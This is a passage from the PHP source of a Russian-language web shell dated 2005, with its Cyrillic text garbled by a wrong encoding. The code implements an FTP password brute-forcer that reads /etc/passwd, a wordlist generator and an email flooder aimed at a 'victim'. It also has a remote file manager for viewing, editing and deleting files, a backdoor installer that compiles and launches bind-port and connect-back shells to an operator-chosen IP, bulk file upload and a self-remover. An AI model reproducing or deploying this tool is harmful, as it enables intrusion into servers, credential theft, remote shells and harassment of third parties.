";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
";} { echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
";} if (file_get_contents("/etc/httpd.conf")) {echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
";} if (file_get_contents("/etc/httpd.conf")) {echo "cpanel log
";} break; // Î ñêðèïòå case "about": echo "Ïðèâåò âñåì!

Íàêîíåö-òî NWRS äîñòóïåí â ïåðâîé ñòàáèëüíîé âåðñèè! Äîáàâèëîñü ìíîæåñòâî íîâûõ ïîëåçíûõ âîçìîæíîñòåé. Âñå ôóíêöèè ñêðèïòà ðàáîòàþò è ðàáîòàþò êîððåêòíî. Äîáàâëåíû óíèêàëüíûå èíñòðóìåíòû äëÿ âçëîìà ñåðâåðà. Â òî æå âðåìÿ íåò íè÷åãî ëèøíåãî. Âñå, ÷òî çàäóìûâàëîñü - ðåàëèçèðîâàíî. Äóìàþ, êàæäûé íàéäåò â ñêðèïòå ÷òî-òî ïîëåçíîå äëÿ ñåáÿ. Òàêæå çàÿâëÿþ î òîì, ÷òî ÿ çàêðûâàþ ïðîåêò, èáî îí äîñòèã èäåàëà :) Ëþáîé ìîæåò åãî ïðîäîëæèòü, php - îòêðûòûé ÿçûê. Íà ïåðâûõ ïîðàõ ñêðèïò âîîáùå áûë òîëüêî ó íåñêîëüêèõ ÷åëîâåê óçêîãî êðóãà äðóçåé, ïèñàë åãî äëÿ ñåáÿ, èç-çà ñâîåé ïðèðîäíîé ëåíè. Íó, è ñïàñèáî ýòèì ëþäÿì: Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (îðôîãðàôèÿ è äèçàéí)... È ìíîãèì äðóãèì... Èõ èäåè î÷åíü ïîìîãëè âîïëîòèòü â æèçíü ñòîëü óíèâåðñàëüíûé èíñòðóìåíò. Îãðîìíîå ñïàñèáî èì!

Ïîìíèòå: èñïîëüçóÿ ýòîò ñêðèïò íà ÷óæèõ ñåðâåðàõ, âû íàðóøàåòå çàêîí :) Òàê ÷òî îñòîðîæíåå."; echo "

Ïîñåòèòå ýòè ñàéòû, è âû âñåãäà áóäåòå â êóðñå ñîáûòèé:

www.ru24-team.net

www.web-hack.ru

www.rst.void.ru

www.hackru.info

www.realcoding.net

www.ccteam.ru

Èçâèíÿþñü, åñëè êîãî çàáûë.
Àâòîð íå íåñåò îòâåòñòâåííîñòè çà ìàòåðèàëû, ðàçìåùåííûå íà ýòèõ ñàéòàõ, îcîáåííî íà ïîñëåäíåì :)

Ñêðèïò ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè GNU GPL
22 Èþëÿ 2005 ã. © DreAmeRz
e-mail: dreamerz@mail.ru ICQ: 817312 WEB: http://www.Ru24-Team.NET"; break; // ÔÒÏ ïîäáîð ïàðîëåé case "ftppass": $filename="/etc/passwd"; // passwd file $ftp_server="localhost"; // FTP-server echo "FTP-server: $ftp_server

"; $fp = fopen ($filename, "r"); if ($fp) { while (!feof ($fp)) { $buf = fgets($fp, 100); ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); $ftp_user_name=$g[1]; $ftp_user_pass=$g[1]; $conn_id=ftp_connect($ftp_server); $login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass); if (($conn_id) && ($login_result)) { echo "Ïîäêëþ÷åíèå login:password - ".$ftp_user_name.":".$ftp_user_name."
"; ftp_close($conn_id);} else { echo $ftp_user_name." - error
"; } }} break; case "ftp": echo "

Ïðîâåðèòü íà ñâÿçêó login\password
FTP Host:
Login:
Êîëëè÷åñòâî ïàðîëåé:	<1000 pass
Ïàðîëü äëÿ ïðîâåðêè:	Ëîã ñîõðàíÿåòñÿ â pass.txt

"; function s() { $word="qwrtypsdfghjklzxcvbnm"; return $word[mt_rand(0,strlen($word)-1)]; } function g() { $word="euioam"; return $word[mt_rand(0,strlen($word)-2)]; } function name0() { return s().g().s(); } function name1() { return s().g().s().g(); } function name2() { return s().g().g().s(); } function name3() { return s().s().g().s().g(); } function name4() { return g().s().g().s().g(); } function name5() { return g().g().s().g().s(); } function name6() { return g().s().s().g().s(); } function name7() { return s().g().g().s().g(); } function name8() { return s().g().s().g().g(); } function name9() { return s().g().s().g().s().g(); } function name10() { return s().g().s().s().g().s().s(); } function name11() { return s().g().s().s().g().s().s().g(); } $cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); $cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker'); function randword() { global $cool; $func="name".mt_rand(0,11); $func2="name".mt_rand(0,11); switch (mt_rand(0,11)) { case 0: return $func().mt_rand(5,99); case 1: return $func()."-".$func2(); case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; case 3: return $func()."!".$func(); case 4: return randpass(mt_rand(5,12)); default: return $func(); } } function randpass($len) { $word="qwertyuiopasdfghjklzxcvbnm1234567890"; $s=""; for ($i=0; $i<$len; $i++) { $s.=$word[mt_rand(0,strlen($word)-1)]; } return $s; } if (@unlink("pass.txt") < 0){ echo "íè÷åãî íåò"; exit; } $file="pass.txt"; if($file && $host && $login){ $cn=mt_rand(30,30); for ($i=0; $i<$cn; $i++) { $s=$cool2[$i]; $f=@fopen(pass.".txt","a+"); fputs($f,"$s\n"); } $cnt2=mt_rand(43,43); for ($i=0; $i<$cnt2; $i++) { $r=$cool[$i]; $f=@fopen(pass.".txt","a+"); fputs($f,"$login$r\n"); } $p="$testing"; $f=@fopen(pass.".txt","a+"); fputs($f,"$p\n"); $cnt3=mt_rand($number,$number); for ($i=0; $i<$cnt3; $i++) { $u=randword(); $f=@fopen(pass.".txt","a+"); fputs($f,"$u\n"); } if(is_file($file)){ $passwd=file($file,1000); for($i=0; $i Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.
  Êîííåêò: $host
  Ëîãèí: $login
  Ïàðîëü: $password ";exit; } elseif(preg_match("/530/",$text)){ $stop=true; } } fclose($open_ftp); }else{ echo "

Íåâåðíî óêàçàí ftp õîñòèíãà!!! Íà $host çàêðûò 21 ïîðò!

";exit; } } } } break; // SQL Attack case "sql": break; // MailFlud case "mailfluder": $email=$_POST['email']; // Ìûëî æåðòâû $from=$_POST['from']; // Ìûëî æåðòâû $num=$_POST['num']; // ×èñëî ïèñåì $text=$_POST['text']; // Òåêñò ôëóäà $kb=$_POST['kb']; // Âåñ ïèñüìà (kb) ?> Æåðòâà: $email
Êîë-âî ïèñåì: $num
Îáùèé ïîñëàííûé îáúåì: $all_kb kb

EOF; } else { echo <<

Ìûëî æåðòâû
Îò ëèïîâîãî ìûëà
×èñëî ïèñåì
Òåêñò ôëóäà
Âåñ ïèñüìà (KB)

EOF; } break; case "tar": # àðõèâàöèÿ äèðåêòîðèè $fullpath = $d."/".$tar; /* çàäàåì ñëó÷àéíûå èìåíà ôàéëîâ àðõèâàöèè*/ $CHARS = "abcdefghijklmnopqrstuvwxyz"; for ($i=0; $i<6; $i++) $charsname .= $CHARS[rand(0,strlen($CHARS)-1)]; echo "
Êàòàëîã $fullpath ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë $charsname.tar.gz"; echo " "; exec($archive); break; // Íàâèãàöèÿ case "navigation": // Ïîøëà íàâèãàöèÿ $mymenu = " [Ïðîñìîòð ] [Óäàëèòü] [Ðåäàêòèðîâàòü] [Î÷èñòèòü] [Çàìåíèòü òåêñò] [Çàãðóçèòü]
"; if(@$_GET['download']){ @$download=$_GET['download']; @$d=$_GET['d']; header("Content-disposition: attachment; filename=\"$download\";"); readfile("$d/$download"); exit;} $images=array(".gif",".jpg",".png",".bmp",".jpeg"); $whereme=getcwd(); @$d=@$_GET['d']; $copyr = ""; $php_self=@$_SERVER['PHP_SELF']; if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} if(!isset($d)){$d=$whereme;} $d=str_replace("\\","/",$d); $expl=explode("/",$d); $coun=count($expl); if($os=="unix"){echo "/";} else{ echo "$expl[0]/";} for($i=1; $i<$coun; $i++){ @$xx.=$expl[$i]."/"; $sls="$expl[$i]/"; $sls=str_replace("//","/",$sls); $sls=str_replace("/'>/","/'>",$sls); print $sls; } echo ""; //if($os=="unix"){ echo " //id: ".@exec('id')." //uname -a: ".@exec('uname -a')."";} if(@$_GET['delfl']){ @$delfolder=$_GET['delfolder']; echo "DELETE FOLDER: ".@$_GET['delfolder']."
(All files must be writable)
Yes || No

"; exit; } if(@$_GET['deldir']){ @$dir=$_GET['dir']; function deldir($dir) { $handle = @opendir($dir); while (false!==($ff = @readdir($handle))){ if($ff != "." && $ff != ".."){ if(@is_dir("$dir/$ff")){ deldir("$dir/$ff"); }else{ @unlink("$dir/$ff"); }}} @closedir($handle); if(@rmdir($dir)){ @$success = true;} return @$success; } $dir=@$dir; deldir($dir); $rback=$_GET['rback']; @$rback=explode("/",$rback); $crb=count($rback); for($i=0; $i<$crb-1; $i++){ @$x.=$rback[$i]."/"; } echo ""; echo $copyr; exit;} if(@$_GET['replace']=="1"){ $ip=@$_SERVER['REMOTE_ADDR']; $d=$_GET['d']; $e=$_GET['e']; @$de=$d."/".$e; $de=str_replace("//","/",$de); $e=@$e; echo $mymenu ; echo " Ñðåäñòâî çàìåíû:
(òû ìîæåøü çàìåíèòü ëþáîé òåêñò)
Ôàéë: $de
"; if(@$_POST['doit']){ $filename="$d/$e"; $fd = @fopen ($filename, "r"); $rpl = @fread ($fd, @filesize ($filename)); $re=str_replace("$this","$bythis",$rpl); $x=@fopen("$d/$e","w"); @fwrite($x,"$re"); echo "
$this çàìåíåíî íà $bythis
[Ïîñìîòðåòü ôàéë]

"; } echo $copyr; exit;} if(@$_GET['yes']=="yes"){ $d=@$_GET['d']; $e=@$_GET['e']; unlink($d."/".$e); $delresult="$d/$e óäàëåí! "; } if(@$_GET['clean']=="1"){ @$e=$_GET['e']; $x=fopen("$d/$e","w"); fwrite($x,""); echo ""; exit; } if(@$_GET['e']){ $d=@$_GET['d']; $e=@$_GET['e']; $pinf=pathinfo($e); if(in_array(".".@$pinf['extension'],$images)){ echo ""; exit;} $filename="$d/$e"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$e; $de=str_replace("//","/",$de); if(is_file($de)){ if(!is_writable($de)){echo "
ÒÎËÜÊÎ ×ÒÅÍÈÅ
";}} echo $mymenu ; echo " Ñîäåðæèìîå ôàéëà:
$de

$c

"; if(@$_GET['delete']=="1"){ $delete=$_GET['delete']; echo " Óäàëåíèå: òû óâåðåí?
Äà || Íåò
"; if(@$_GET['yes']=="yes"){ @$d=$_GET['d']; @$e=$_GET['e']; echo $delresult; } if(@$_GET['no']){ echo " "; } } #end of delete echo $copyr; exit; } #end of e if(@$_GET['edit']=="1"){ @$d=$_GET['d']; @$ef=$_GET['ef']; if(is_file($d."/".$ef)){ if(!is_writable($d."/".$ef)){echo "
ÒÎËÜÊÎ ×ÒÅÍÈÅ
";}} echo $mymenu ; $filename="$d/$ef"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$ef; $de=str_replace("//","/",$de); echo " Ðåäàêòèðîâàíèå:
$de

"; if(@$_POST['save']){ $editf=@$_POST['editf']; $editf=stripslashes($editf); $f=fopen($filename,"w+"); fwrite($f,"$editf"); echo ""; exit; } echo $copyr; exit; } echo" "; $dirs=array(); $files=array(); $dh = @opendir($d) or die("

Íàçâàíèå

Òèï

Ðàçìåð

Âëàäåëåö/Ãðóïïà

Ïðàâà

Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïðåùåí!
$copyr

"); while (!(($file = readdir($dh)) === false)) { if ($file=="." || $file=="..") continue; if (@is_dir("$d/$file")) { $dirs[]=$file; }else{ $files[]=$file; } sort($dirs); sort($files); $fz=@filesize("$d/$file"); } function perm($perms){ if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } for($i=0; $i0 $linkdDIR $owner/$group$info"; } for($i=0; $i2 $files[$i]`$siz$owner/$group$info"; } echo ""; echo $copyr; break; // Óñòàíîâêà áåêäîðà case "backconnect": echo "Óñòàíîâêà áåêäîðà / îòêðûòèå ïîðòà"; echo ""; echo "Óñòàíîâêà áåêäîðà / connect-back"; echo ""; /* port bind C */ if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) { $w_file=fopen("/tmp/bd.c","ab+") or $err=1; if($err==1) { echo "

ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/bd.c

"; $err=0; } else { fputs($w_file,base64_decode($port_bind_bd_c)); fclose($w_file); $blah=exec("gcc -o /tmp/bd /tmp/bd.c"); unlink("/tmp/bd.c"); $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"; $blah=exec($bind_string); $_POST['cmd']="ps -aux | grep bd"; $err=0; } } /* port bind Perl */ if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) { $w_file=fopen("/tmp/bdpl","ab+") or $err=1; if($err==1) { echo "

ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/

"; $err=0; } else { fputs($w_file,base64_decode($port_bind_bd_pl)); fclose($w_file); $bind_string="perl /tmp/bdpl ".$_POST['port']." &"; $blah=exec($bind_string); $_POST['cmd']="ps -aux | grep bdpl"; $err=0; } } /* back connect Perl */ if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) { $w_file=fopen("/tmp/back","ab+") or $err=1; if($err==1) { echo "

ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/

"; $err=0; } else { fputs($w_file,base64_decode($back_connect)); fclose($w_file); $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &"; $blah=exec($bc_string); $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\""; $err=0; } } /* back connect C */ if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) { $w_file=fopen("/tmp/back.c","ab+") or $err=1; if($err==1) { echo "

ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/back.c

"; $err=0; } else { fputs($w_file,base64_decode($back_connect_c)); fclose($w_file); $blah=exec("gcc -o /tmp/backc /tmp/back.c"); unlink("/tmp/back.c"); $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"; $blah=exec($bc_string); $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\""; $err=0; } } echo "Âûïîëíåííàÿ êîìàíäà: ".$_POST['cmd'].""; echo ""; echo "
Ðåçóëüòàò: "; echo ""; break; // Uploading case "upload": echo <<Çàãðóçêà ôàéëîâ * Çàãðóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *

$tend HTML; if (isset($_POST['path'])){ $uploadfile = $_POST['path'].$_FILES['file']['name']; if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} if (copy($_FILES['file']['tmp_name'], $uploadfile)) { echo "Ôàéë óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n"; echo "Èìÿ:" .$_FILES['file']['name']. "\n"; echo "Ðàçìåð:" .$_FILES['file']['size']. "\n"; } else { print "Íå óäà¸òñÿ çàãðóçèòü ôàéë. Info:\n"; print_r($_FILES); } } echo "Çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà:
HTTP-ïóòü ê ôàéëó:

Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà:

"; $data = @implode("", file($file3)); $fp = @fopen($file2, "wb"); @fputs($fp, $data); $ok = @fclose($fp); if($ok) { $size = filesize($file2)/1024; $sizef = sprintf("%.2f", $size); print "
Âû çàãðóçèëè: ôàéë $file2 ðàçìåðîì (".$sizef."êÁ) "; } else { print "
Îøèáêà çàãðóçêè ôàéëà"; } break; // Tools case "tools": echo "Ãåíåðàöèÿ md5-øèôðà

"; @$md5=@$_POST['md5']; if(@$_POST['md5']){ echo "md5 ñãåíåðèðîâàí:
".md5($md5)."";} echo "
Êîäèðîâàíèå/äåêîäèðîâàíèå base64

"; if(@$_POST['base64']){ @$base64=$_POST['base64']; echo " Êîäèðîâàíî:

Äåêîäèðîâàíî:

";} echo "
DES-êîäèðîâàíèå:

"; if(@$_POST['des']){ @$des=@$_POST['des']; echo "DES ñãåíåðèðîâàí:
".crypt($des)."";} echo "
SHA1-êîäèðîâàíèå:

"; if(@$_POST['sha1']){ @$des=@$_POST['sha1']; echo "SHA1 ñãåíåðèðîâàí:
".sha1($sha1a)."";} echo ""; echo "html-êîä -> øåñòíàäöàòèðè÷íûå çíà÷åíèÿ
"; if (isset($_POST['data'])) { echo "

Ðåçóëüòàò:
"; $str=str_replace("%20","",$_POST['data']); for($i=0;$i

"; if(@$_POST['massupload']){ $where=@$_POST['where']; $uploadfile1 = "$where/".@$_FILES['text1']['name']; $uploadfile2 = "$where/".@$_FILES['text2']['name']; $uploadfile3 = "$where/".@$_FILES['text3']['name']; $uploadfile4 = "$where/".@$_FILES['text4']['name']; $uploadfile5 = "$where/".@$_FILES['text5']['name']; $uploadfile6 = "$where/".@$_FILES['text6']['name']; $uploadfile7 = "$where/".@$_FILES['text7']['name']; $uploadfile8 = "$where/".@$_FILES['text8']['name']; $uploadfile9 = "$where/".@$_FILES['text9']['name']; $uploadfile10 = "$where/".@$_FILES['text10']['name']; $uploadfile11 = "$where/".@$_FILES['text11']['name']; $uploadfile12 = "$where/".@$_FILES['text12']['name']; $uploadfile13 = "$where/".@$_FILES['text13']['name']; $uploadfile14 = "$where/".@$_FILES['text14']['name']; $uploadfile15 = "$where/".@$_FILES['text15']['name']; $uploadfile16 = "$where/".@$_FILES['text16']['name']; $uploadfile17 = "$where/".@$_FILES['text17']['name']; $uploadfile18 = "$where/".@$_FILES['text18']['name']; $uploadfile19 = "$where/".@$_FILES['text19']['name']; $uploadfile20 = "$where/".@$_FILES['text20']['name']; if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile1
";} if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile2
";} if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile3
";} if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile4
";} if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile5
";} if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile6
";} if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile7
";} if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile8
";} if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile9
";} if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile10
";} if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile11
";} if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile12
";} if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile13
";} if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile14
";} if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile15
";} if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile16
";} if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile17
";} if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile18
";} if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile19
";} if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile20
";} } exit; break; case "selfremover": print "

Ôàéë:
Ïàïêà:
"; print "Òû óâåðåí, ÷òî õî÷åøü óäàëèòü ýòîò øåëë ñ ñåðâåðà? Äà, õî÷ó \| Íåò, ïóñòü åùå ïîáóäåò Áóäåì óäàëÿòü "; $path=__FILE__; print $path; print "?

"; die; } if($p=="yes"){ $path=__FILE__; @unlink($path); $path=str_replace("\\","/",$path); if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!"; print "Ôàéë $path íå óäàëåí!"; }else{$hmm="Óäàëåí";} print ""; } break; ?>


Õîñò:

Ïîðò:

Ëîãèí:
Ïàðîëü:

PHP v".@phpversion()." mySQL v".@mysql_get_server_info()." ";}?>